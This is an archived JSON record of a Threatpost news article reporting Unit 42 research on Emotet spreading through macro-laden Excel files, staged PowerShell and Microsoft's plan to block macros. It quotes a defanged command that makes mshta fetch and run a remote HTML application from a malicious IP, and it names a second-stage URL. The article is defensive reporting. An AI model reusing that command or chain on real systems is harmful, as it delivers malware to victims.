{
	"id": "9ea30017-4919-4c2c-ac7f-a383b5b00969",
	"created_at": "2026-04-06T02:12:28.175231Z",
	"updated_at": "2026-04-10T03:20:20.960666Z",
	"deleted_at": null,
	"sha1_hash": "5f7dbc5d99d81740551c91d302d04ba4dd1836e7",
	"title": "Emotet Now Spreading Through Malicious Excel Files",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 79880,
	"plain_text": "Emotet Now Spreading Through Malicious Excel Files\r\nBy Elizabeth Montalbano\r\nPublished: 2022-02-16 · Archived: 2026-04-06 01:36:22 UTC\r\nAn ongoing malicious email campaign that includes macro-laden files and multiple layers of obfuscation has been\r\nactive since late December.\r\nThe infamous Emotet malware has switched tactics yet again, in an email campaign propagating through\r\nmalicious Excel files, researchers have found.\r\nResearchers at Palo Alto Networks Unit 42 have observed a new infection approach for the high-volume malware,\r\nwhich is known to modify and change its attack vectors to avoid detection so it can continue to do its nefarious\r\nwork, they wrote in a report published online Tuesday.\r\n“Emotet’s new attack chain reveals multiple stages with different file types and obfuscated script before arriving at\r\nthe final Emotet payload,” Unit 42 researchers Saqib Khanzada, Tyler Halfpop, Micah Yates and Brad Duncan\r\nwrote.\r\nThe new attack vector—discovered on Dec. 21 and still active–delivers an Excel file that includes an obfuscated\r\nExcel 4.0 macro through socially engineered emails.\r\n“When the macro is activated, it downloads and executes an HTML application that downloads two stages of\r\nPowerShell to retrieve and execute the final Emotet payload,” researchers wrote.\r\nThe Malware That Won’t Die\r\nEmotet started life as a banking trojan in 2014 and has continually evolved to become a full-service threat-delivery mechanism, at one point existing as a botnet that held more than 1.5 million machines under its control,\r\naccording to Check Point Software. Typical consequences of TrickBot infections are bank-account takeover, high-value wire fraud and ransomware attacks.\r\nIndeed, at the end of its original heyday, the estimated damage from Emotet was around $2.5 billion dollars,\r\nresearchers have said.\r\nThen, Emotet appeared to be put out of commission by an international law-enforcement collaborative takedown\r\nof a network of hundreds of botnet servers supporting the system in January 2021. However, it resurfaced last\r\nNovember on the back of frequent partner-in-crime TrickBot — and now continues to be a threat.\r\nSince its return, Emotet has used thread hijacking and other types of tactics as part of novel attack methods..\r\nhttps://threatpost.com/emotet-spreading-malicious-excel-files/178444/\r\nPage 1 of 3\n\n“This technique generates fake replies based on legitimate emails stolen from mail clients of Windows hosts\r\npreviously infected with Emotet,” Unit 42 researchers wrote. “The botnet uses this stolen email data to create fake\r\nreplies impersonating the original senders.”\r\nExamples of this method included using links to install a fake Adobe Windows App Installer Package that were\r\nreported in December, researchers wrote.\r\nUsing Excel Macros\r\nThe new Emotet infection method using Excel macros also has several variations, according to Unit 42.\r\n“In some cases, Emotet uses a password-protected .ZIP archive as an attachment to its email,” researchers\r\nexplained. “In other cases, Emotet uses an Excel spreadsheet directly attached to the email.”\r\nResearchers outlined an email sent by the Emotet botnet on Jan. 27 that uses a stolen email thread from June 2021.\r\nThe email uses a lure heralding a “new announcement” to a “valuable supplier” and contains an encrypted .ZIP\r\nfile in an attempt to bypass security systems, researchers wrote. It also includes the password to the .ZIP file in the\r\nemail, so the victim can extract its contents.\r\n“The encrypted .ZIP file contains a single Excel document with Excel 4.0 macros,” researchers wrote “These\r\nmacros are an old Excel feature that is frequently abused by malicious actors. The victim must enable macros on a\r\nvulnerable Windows host before the malicious content is activated.”\r\nOnce that’s done, the macro code executes cmd.exe to run mshta.exe, with an argument to retrieve and execute a\r\nremote HTML application that downloads and executes additional PowerShell code, researchers wrote.\r\n“The code utilizes hex and character obfuscation in order to attempt to bypass static detection measures,” they\r\nexplained. “The deobfuscated command string that is executed is: cmd /c mshta\r\nhxxp://91.240.118[.]168/se/s.html.”\r\nThe initial obfuscated PowerShell script connects to hxxp://91.240.118[.]168/se/s.png, a URL that returns text-based script for a second-stage set of PowerShell code designed to retrieve an Emotet binary.\r\n“This second-stage PowerShell code…contains 14 URLs to retrieve the Emotet binary,” researchers wrote. “The\r\nscript attempts each URL until an Emotet binary is successfully downloaded.”\r\nHaving multiple URLs in its attack chain is aimed at making it more resilient in the event that one of the URLs is\r\ntaken down, researchers said. The final stage of the attack chain occurs when the Emotet .DLL loads an encrypted\r\nPE from its resource section, they added.\r\nMicrosoft to Block Macros by Default\r\nLast week, Microsoft announced a plan to disable all macros by default in some applications, acknowledging that\r\nthe mechanism is one of the world’s most popular ways to deliver malware.\r\n“For the protection of our customers, we need to make it more difficult to enable macros in files obtained from the\r\ninternet,” the computing giant noted. “VBA macros obtained from the internet will now be blocked by default.”\r\nhttps://threatpost.com/emotet-spreading-malicious-excel-files/178444/\r\nPage 2 of 3\n\nThree popular Office apps, Word, Excel and PowerPoint, plus Access and Visio, are affected by the change.\r\n“For macros in files obtained from the internet, users will no longer be able to enable content with a click of a\r\nbutton,” Microsoft said. “The default is more secure and is expected to keep more users safe including home users\r\nand information workers in managed organizations.”\r\nStarting in late April, instead of a button to “enable macros,” users will be prompted with a “learn more” button\r\nthat will take them to additional information before they can activate macros within a document.\r\nJoin Threatpost on Wed. Feb 23 at 2 PM ET for a LIVE roundtable discussion, “The Secret to Keeping\r\nSecrets,” sponsored by Keeper Security, will focus on how to locate and lock down your organization’s most\r\nsensitive data. Zane Bond with Keeper Security will join Threatpost’s Becky Bracken to offer concrete steps to\r\nprotect your organization’s critical information in the cloud, in transit and in storage. REGISTER NOW and\r\nplease Tweet us your questions ahead of time @Threatpost so they can be included in the discussion.\r\nSource: https://threatpost.com/emotet-spreading-malicious-excel-files/178444/\r\nhttps://threatpost.com/emotet-spreading-malicious-excel-files/178444/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://threatpost.com/emotet-spreading-malicious-excel-files/178444/"
	],
	"report_names": [
		"178444"
	],
	"threat_actors": [],
	"ts_created_at": 1775441548,
	"ts_updated_at": 1775791220,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5f7dbc5d99d81740551c91d302d04ba4dd1836e7.pdf",
		"text": "https://archive.orkl.eu/5f7dbc5d99d81740551c91d302d04ba4dd1836e7.txt",
		"img": "https://archive.orkl.eu/5f7dbc5d99d81740551c91d302d04ba4dd1836e7.jpg"
	}
}